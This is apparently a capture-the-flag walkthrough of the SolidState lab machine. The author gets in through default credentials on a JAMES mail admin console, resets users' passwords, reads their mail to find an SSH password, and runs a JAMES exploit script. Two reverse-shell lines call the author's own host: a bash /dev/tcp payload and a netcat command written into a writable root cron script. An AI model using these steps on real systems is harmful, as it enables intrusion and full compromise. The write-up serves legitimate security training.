The first step as always was to run Nmap against the machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nmap -p- -oN scan -sC -sV -O 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 13:52 EST
Nmap scan report for 10.10.10.51
Host is up (0.022s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.14 [10.10.14.14]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=1/22%OT=22%CT=1%CU=30027%PV=Y%DS=2%DC=I%G=Y%TM=600B1F3
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1
OS:1NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.22 seconds
There are a number of ports open. It appeared to be running a mailserver. The one of interest is port 4555 which is the remote admin interface. I telnetted to this port and was greeted with a login prompt.
1
2
3
4
5
6
7
8
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
After some googling I discovered the default credentials for this interface were root:root. I tried these and successfully logged in. I was then able to list the mail users:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
I then changed the password for each of the users to “password” using the setpassword command:
1
2
3
4
5
6
7
8
9
10
setpassword mindy password
Password for mindy reset
setpassword james password
Password for james reset
setpassword john password
Password for john reset
setpassword thomas password
Password for thomas reset
setpassword mailadmin password
Password for mailadmin reset
I then connected to port 110 using telnet and attempted to read the emails on the accounts:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# telnet 10.10.10.51 110 1 ⨯
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass password
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
As you can see from the output, I was able to view Mindys email using the password I set. Her username and password used to log in to the machine were provided in the email. I then connected via ssh to the machine using the credentials mindy:P@55W0rd1!2@:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 26 12:56:58 2021 from 10.10.14.14
mindy@solidstate:~$ ls
bin LinEnum.sh out.txt thu.txt user.txt
mindy@solidstate:~$ cat user.txt
[REDACTED]
mindy@solidstate:~$
As you can see from the output, this was successfully, and I was able to capture the user flag.
Mindy’s default shell is rbash. Which is a restricted version of bash. So you cannot navigate outside the home directroy. I discovered an exploit HERE which creates a user using the JAMES remote administration tool with a local file inclusion, this user is then emailed a payload which is executed when logging in to the machine.
I modified the payload variable at the top of the script with the following string which creates a reverse shell back to my machine:
1
payload = 'bash -i >& /dev/tcp/10.10.14.14/2601 0>&1'
I executed the payload against the Solidstate machine:
1
2
3
4
5
6
7
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# python 35513 10.10.10.51 130 ⨯ 1 ⚙
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
I then started a netcat listener on port 2601:
1
2
3
4
5
6
7
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nc -nvlp 2601 1 ⚙
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2601
Ncat: Listening on 0.0.0.0:2601
Then logged in via SSH to execute the payload.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nc -nvlp 2601 1 ⚙
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2601
Ncat: Listening on 0.0.0.0:2601
Ncat: Connection from 10.10.10.51.
Ncat: Connection from 10.10.10.51:41548.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd /
cd /
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$
As you can see, the payload was executed and captured in the netcat listener. rbash is no longer being used and so can navigate outside the home directory.
I next went on to find a way to esclate privilages. I discovered a file in /opt/ called tmp.py This file was writable by the mindy user but owned by root. It appeared to be a script used to clear the /tmp/ directory. I echoed some python code into this file to spawn another reverse shell back to my attacking machine:
1
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo "import os;os.system('nc -e /bin/sh 10.10.14.14 2123')" > tmp.py
The hopes with this is that the script is run on a schedual, considering it was owned by root it would hopefully be run by root as well. I started another netcat listener on port 2123 as specified in the tmp.py file, and waited.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nc -nvlp 2123
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2123
Ncat: Listening on 0.0.0.0:2123
Ncat: Connection from 10.10.10.51.
Ncat: Connection from 10.10.10.51:42662.
ls
root.txt
whoami
root
cat root.txt
[REDACTED]
After a few minutes, as you can see from the output, a shell was captured by the listener, and it was infact a root shell so was able to capture the root flag.